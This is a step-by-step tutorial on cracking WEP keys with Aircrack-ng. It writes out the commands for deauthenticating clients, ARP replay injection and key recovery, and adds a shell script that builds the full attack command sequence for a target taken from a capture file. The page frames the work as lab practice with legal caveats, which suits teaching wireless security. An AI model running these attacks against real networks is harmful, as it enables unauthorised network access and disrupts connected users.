TL;DR
This guide shows how to recover a WEP key with the Aircrack-ng suite, using an ARP replay attack to generate the initialisation vectors (IVs) that the key-recovery step needs. WEP has been broken for many years, but the procedure is still useful for understanding why WEP fails and for practising wireless testing in a lab you control.
Prerequisites
- A wireless network interface card (NIC) that supports monitor mode and packet injection.
- The Aircrack-ng suite installed on your Linux system (Kali Linux is recommended).
- Root privileges (sudo access).
- A target WEP network. Important: Only test this on networks you own or have explicit permission to assess.
Steps
- Put your wireless interface into monitor mode. In monitor mode the card passes every 802.11 frame it hears on the channel to user space, not just frames addressed to it.

```bash
sudo airmon-ng start wlan0
```

This normally creates a new interface named wlan0mon; use that interface for the following steps. If airmon-ng warns about processes such as NetworkManager or wpa_supplicant that could interfere, run `sudo airmon-ng check kill` first. You can confirm that injection works with `sudo aireplay-ng -9 wlan0mon`.
- Identify your target network. Use airodump-ng to list nearby networks and find the BSSID (the access point's MAC address) of your WEP target.

```bash
sudo airodump-ng wlan0mon
```

Note down the BSSID, the channel (CH column) and the ESSID (network name). The ENC column shows WEP for networks still using it, and the STATION section at the bottom lists the client MAC addresses associated with each BSSID, which you will need later.
- Capture traffic on the target network. Lock airodump-ng to the target's channel and BSSID so the capture contains only that network's frames.

```bash
sudo airodump-ng -c <channel_number> --bssid <BSSID> -w capture wlan0mon
```

Replace <channel_number> and <BSSID> with the values you noted in step 2. The -w capture option writes the captured frames to files named capture-01.cap, capture-01.csv and so on. Leave this running in its own terminal for the rest of the procedure; its #Data column shows how many data frames (for WEP, unique IVs) have been collected for the target.

- Deauthenticate a client (optional, but speeds up the process). A deauthentication frame forces the client to reassociate, and a client that reconnects usually sends an ARP request, which is exactly the packet the next step needs to capture and replay.

```bash
sudo aireplay-ng -0 1 -a <BSSID> -c <client_MAC_address> wlan0mon
```

Replace <BSSID> with the target network's BSSID and <client_MAC_address> with a client associated with that network (listed in the STATION section of the airodump-ng output). Repeat this a few times if the ARP replay in the next step does not pick up a request.
- Perform an ARP replay attack. aireplay-ng waits for an ARP request from the client and then re-injects it towards the access point over and over. ARP requests are used because their fixed size makes them recognisable even though they are encrypted, and each replay makes the AP retransmit the packet with a fresh IV, which is what the key-recovery attack needs.

```bash
sudo aireplay-ng -3 -b <BSSID> -h <client_MAC_address> wlan0mon
```

Replace <BSSID> with the target network's BSSID and <client_MAC_address> with the MAC address of an associated client. The source MAC given with -h must be one the AP accepts frames from, which is why an associated client's address is used. Let this run for several minutes, watching the #Data column in airodump-ng, until you have enough IVs: roughly 20,000 for a 40-bit (64-bit) key and 40,000 to 50,000 for a 104-bit (128-bit) key are a good starting point, though recovery can succeed with fewer or need more.
- Crack the WEP key. Run aircrack-ng on the capture files; it can run while airodump-ng is still writing, and it re-reads the files as more IVs arrive.

```bash
sudo aircrack-ng -b <BSSID> capture*.cap
```

The -b option restricts the attack to the target BSSID, which matters if the capture also contains frames from other networks. Aircrack-ng uses the captured IVs to recover the key and, if successful, prints KEY FOUND! with the key in hexadecimal and, when it is printable, as ASCII. If it fails, keep the ARP replay running and try again once more IVs have been collected.
- Stop monitor mode once you have finished capturing traffic.

```bash
sudo airmon-ng stop wlan0mon
```

If you stopped NetworkManager earlier with `airmon-ng check kill`, restart it (for example `sudo systemctl start NetworkManager`) to get your normal connection back.
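The steps above, as an added example that is not part of the page or of the Aircrack-ng project: a small POSIX shell script that reads the CSV file airodump-ng writes alongside the capture (capture-01.csv), lists the WEP networks and their associated clients, checks the "# IV" column against the threshold from step 5, and prints the exact command lines for one target with every placeholder filled in. It prints rather than runs the commands because airodump-ng and aireplay-ng each need their own terminal. It assumes the interface wlan0 with monitor interface wlan0mon and the capture prefix "capture" (all overridable through environment variables), relies on the column order of airodump-ng's CSV (Privacy in column 6, "# IV" in column 11 and ESSID in column 14 of the access-point table; the associated BSSID in column 6 of the station table), and ships with a constructed sample CSV, not real capture data, so it can be tried offline.

```shell
#!/bin/sh
# wep_plan.sh: added example for this page, not part of the Aircrack-ng project.
# Reads the CSV that "airodump-ng -w <prefix>" writes (<prefix>-01.csv), lists WEP
# access points and their associated clients, checks the "# IV" column against the
# IV threshold from the steps above, and prints the exact command lines to run.
# Assumptions: interface wlan0 (override with IFACE), monitor interface ${IFACE}mon
# (override with MON), capture prefix "capture" (override with PREFIX).
set -eu

IFACE="${IFACE:-wlan0}"
MON="${MON:-${IFACE}mon}"
PREFIX="${PREFIX:-capture}"

# The command lines from the tutorial, with the placeholders filled in.
cmd_monitor_start() { printf 'sudo airmon-ng start %s\n' "$IFACE"; }
cmd_capture()       { printf 'sudo airodump-ng -c %s --bssid %s -w %s %s\n' "$1" "$2" "$PREFIX" "$MON"; }
cmd_deauth()        { printf 'sudo aireplay-ng -0 1 -a %s -c %s %s\n' "$1" "$2" "$MON"; }
cmd_arp_replay()    { printf 'sudo aireplay-ng -3 -b %s -h %s %s\n' "$1" "$2" "$MON"; }
cmd_crack()         { printf 'sudo aircrack-ng -b %s %s-*.cap\n' "$1" "$PREFIX"; }
cmd_monitor_stop()  { printf 'sudo airmon-ng stop %s\n' "$MON"; }

# Reject anything that is not a colon-separated 48-bit MAC before it reaches a command line.
valid_mac() { printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'; }

# csv_query <aps|clients|ivs> <csv> [bssid]
# airodump-ng's CSV holds an access-point table (header starts "BSSID") followed by a
# station table (header starts "Station MAC"); fields are comma separated with padding.
csv_query() {
  awk -F',' -v mode="$1" -v bssid="${3:-}" '
    function trim(s) { sub(/^ +/, "", s); sub(/ +$/, "", s); return s }
    { sub(/\r$/, "") }
    trim($1) == "BSSID"       { sec = "ap";  next }
    trim($1) == "Station MAC" { sec = "sta"; next }
    sec == "ap"  && mode == "aps"     && NF >= 14 && trim($6) ~ /WEP/  { print trim($1), trim($4) + 0, trim($14) }
    sec == "ap"  && mode == "ivs"     && trim($1) == bssid             { print trim($11) + 0 }
    sec == "sta" && mode == "clients" && NF >= 6  && trim($6) == bssid { print trim($1) }
  ' "$2"
}
wep_aps()    { csv_query aps "$1"; }            # "BSSID channel ESSID" per WEP network
clients_of() { csv_query clients "$1" "$2"; }   # station MACs associated with a BSSID
iv_count()   { csv_query ivs "$1" "$2"; }       # value of the "# IV" column for a BSSID

# Succeeds once the capture holds at least THRESHOLD IVs (default 20000, the low end of
# the range the steps recommend); keep aireplay-ng -3 running until this passes.
enough_ivs() { n=$(iv_count "$1" "$2"); [ "${n:-0}" -ge "${3:-20000}" ]; }

# Print the whole command sequence for one WEP BSSID, taking the channel and the first
# associated client from the CSV so that no placeholder is filled in by hand.
plan_attack() {
  csv="$1"; bssid="$2"
  valid_mac "$bssid" || { printf 'invalid BSSID: %s\n' "$bssid" >&2; return 1; }
  ch=$(wep_aps "$csv" | awk -v b="$bssid" '$1 == b { print $2; exit }')
  [ -n "$ch" ] || { printf '%s is not a WEP network in %s\n' "$bssid" "$csv" >&2; return 1; }
  client=$(clients_of "$csv" "$bssid" | head -n 1)
  # aireplay-ng -3 needs a source MAC the AP accepts frames from; without an associated
  # client you would first need a fake authentication (aireplay-ng -1), not covered here.
  [ -n "$client" ] || { printf 'no associated client for %s\n' "$bssid" >&2; return 1; }
  cmd_monitor_start
  cmd_capture "$ch" "$bssid"
  cmd_deauth "$bssid" "$client"
  cmd_arp_replay "$bssid" "$client"
  cmd_crack "$bssid"
  cmd_monitor_stop
}

# Constructed sample in airodump-ng's CSV layout (not a real capture): one WEP AP with
# one associated client, one WPA2 AP with its own client, and one unassociated station.
sample_csv() {
  f=$(mktemp)
  cat > "$f" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP, OPN, -40,  120,  1200,   0.  0.  0.  0,   7, HomeWEP,
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -60,   90,     0,   0.  0.  0.  0,   9, Neighbour,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50,  300, 00:11:22:33:44:55, HomeWEP
AA:BB:CC:DD:EE:02, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -70,   12, (not associated) ,
AA:BB:CC:DD:EE:03, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -65,   40, 66:77:88:99:AA:BB,
EOF
  printf '%s' "$f"
}

# Usage: sh wep_plan.sh capture-01.csv <BSSID>; with no arguments it runs on the sample.
if [ "$#" -ge 2 ]; then
  plan_attack "$1" "$2"
elif [ "$#" -eq 0 ]; then
  f=$(sample_csv); plan_attack "$f" 00:11:22:33:44:55; rm -f "$f"
fi
```

Run it against the real capture-01.csv while airodump-ng is still writing: `plan_attack` refuses a BSSID whose Privacy column is not WEP and one without an associated client, and `enough_ivs capture-01.csv <BSSID>` can be polled in a loop to decide when to stop the ARP replay and start aircrack-ng.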
Important Considerations
- Legal implications: Recovering WEP keys for networks you do not own or have written permission to test is illegal in most jurisdictions. This guide is for educational use in a lab you control.
- WEP is outdated: WEP encrypts with RC4 under a 24-bit IV that is sent in the clear and repeats quickly, so statistical attacks such as the PTW attack aircrack-ng uses by default recover the key from captured traffic in minutes. Modern networks should use WPA2 or WPA3.
- IVs are key: The more unique IVs you capture, the higher your chances of recovering the key; if aircrack-ng fails, collect more and rerun it.
- Client activity: Active clients generate the traffic, and in particular the ARP requests, that the replay attack depends on; an idle network with no associated clients is much slower to attack.

